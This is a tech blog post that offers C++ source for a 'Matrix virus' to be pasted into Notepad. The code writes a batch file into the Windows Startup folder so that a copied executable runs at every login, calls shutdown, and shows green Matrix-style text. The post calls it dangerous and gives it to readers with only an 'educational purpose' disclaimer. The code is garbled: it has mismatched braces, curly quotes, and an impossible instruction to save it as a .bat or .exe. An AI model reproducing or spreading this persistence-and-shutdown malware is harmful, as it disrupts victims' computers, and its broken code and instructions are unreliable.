Satvir Matharu Blog

We provide latest Technology Tips, tricks and solutions regarding Android and Windows OS with Technical Videos.

How To Create Matrix Virus Using NotePad

How To Create Matrix Virus Using NotePad

Hlo everyone,

        Today i will help u to create a most dangerous virus Matrix .This Virus is really very dangerous . This virus is created by  W3irdo . So lets start follow the steps below :->


                         

                …Steps…

  • Open Notepad .
  • Copy the given code below

#include <iostream>

 #include <stdlib.h>

 #include <windows.h> 

#include <iomanip> 

#include <stdio.h> 

#include <conio.h> 

#include <fstream> 

using namespace std; 

int main() 

 {  keybd_event(VK_MENU,0x38,0,0); 

 keybd_event(VK_RETURN,0x1c,0,0); 

keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0); 

keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0); 

HANDLE outToScreen; 

 outToScreen =  GetStdHandle(STD_OUTPUT_HANDLE); 

 { 

 char buffer[255]; 

 char inputFile[]=”C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat”; 

 ifstream input(inputFile);

 if (!input) 

ofstream fp(“C:\Documents andSettings\All Users\Start Menu\Programs\Startup\rawr.bat”, ios::app); 

fp << “@ECHO OFF n”; 

fp << “START C:\rawr.exe n”; 

fp << “EXIT”; 

else 

while (!input.eof())  

input.getline(buffer,255); 

char buffer[255]; char inputFile[]=”C:\rawr.exe”; 

ifstream input(inputFile); 

if (!input) 

ofstream fp(“CLICK.bat”, ios::app); 

fp << “@ECHO OFF n”; 

fp << “COPY matrix.exe C:\rawr.exe n”; 

fp << “START C:\rawr.exe n”; 

fp << “EXIT”; 

system(“START CLICK.bat”); 

main(); 

else 

while (!input.eof()) 

{ input.getline(buffer,255); 

system(“call shutdown.exe -S”); 

goto START; 

START:{

 for(int i = 0; i < 1; i++) 

int num = (rand() % 10); 

SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN |FOREGROUND_INTENSITY); 

cout << setw(4) << num; 

cout << setw(4) << “0%”; 

cout << setw(4) << “P”; 

cout << setw(4) << ” “; 

cout << setw(4) << “)”; 

cout << setw(4) << “#”; 

cout << setw(4) << “X”; 

cout << setw(4) << “@”; 

cout << setw(4) << “1&”; 

cout << setw(4) << “*”; 

cout << setw(4) << “||”; 

cout << setw(4) << ” a”; 

Sleep(60); 

for ( int j = 0;

 j < 5;  

j++) 

{ SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN); 

int number = (rand() % 24); 

cout << setw(4) << number; 

goto START; 

}

  • Save this Code as matharublogvirus.bat or matrix.exe
  • Done!!!!!

                        

   

Virus


        ….Warning….

         

            Don’t run this file on your own computer because if you do it this, then your pc may never get turn on again. This post is only for educational purpose..

I am not responsible for any damage.



Thanks For Reading……

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Back to top
%d bloggers like this: